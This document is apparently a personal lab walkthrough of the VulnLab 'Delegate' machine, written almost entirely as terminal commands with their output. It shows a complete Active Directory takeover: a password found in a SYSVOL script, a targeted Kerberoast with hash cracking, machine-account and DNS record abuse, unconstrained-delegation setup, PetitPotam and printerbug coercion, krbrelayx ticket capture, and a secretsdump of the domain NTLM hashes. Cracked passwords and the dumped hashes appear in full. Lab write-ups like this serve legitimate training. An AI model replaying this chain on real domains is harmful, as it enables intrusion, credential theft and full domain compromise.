vulnlab-delegate
a hard machine
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023
5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\>
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
Bloodhound to get more info
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S
Upload data to Bloodhound, we find
The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user
A targeted kerberoast attack can be performed using targetedKerberoast.py.
targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py venv
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$
....
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341 (?)
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP dc1.delegate.vl 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ dc1.delegate.vl 389 DC1 [*] Getting the MachineAccountQuota
MAQ dc1.delegate.vl 389 DC1 MachineAccountQuota: 10
.
a new tool ( dnstool , printerbug )
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git
Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py dnstool.py krbrelayx.py lib LICENSE printerbug.py README.md venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket
Collecting impacket
Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
.
new tools ( bloodyad.py , addspn.py & PetitPotam.py)
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py bloodyAD dnstool.py krbrelayx.py lib LICENSE PetitPotam printerbug.py README.md venv
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py bloodyAD dnstool.py krbrelayx.py lib LICENSE PetitPotam printerbug.py README.md venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$
Below the bloodyAD installed in Python Virtual Enviroment ( i had troubles with dependicies)
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
Traceback (most recent call last):
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
from bloodyAD import main
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
from .network.config import Config, ConnectionHandler
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
from bloodyAD.network.ldap import Ldap
File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$
.
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Using powermad & printerbug
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
setup the listener ( waiting for connection then)
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
start printerbug
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py 'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' krbrelayx.py LICENSE printerbug.py venv
bloodyAD dnstool.py lib PetitPotam README.md
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra
Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
use impacket-secrectsdump to get the hashes.
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL
Valid starting Expires Service principal
06/12/2024 07:13:23 06/12/2024 17:07:36 krbtgt/DELEGATE.VL@DELEGATE.VL
renew until 06/19/2024 07:07:36
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up...
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
.
What a ride.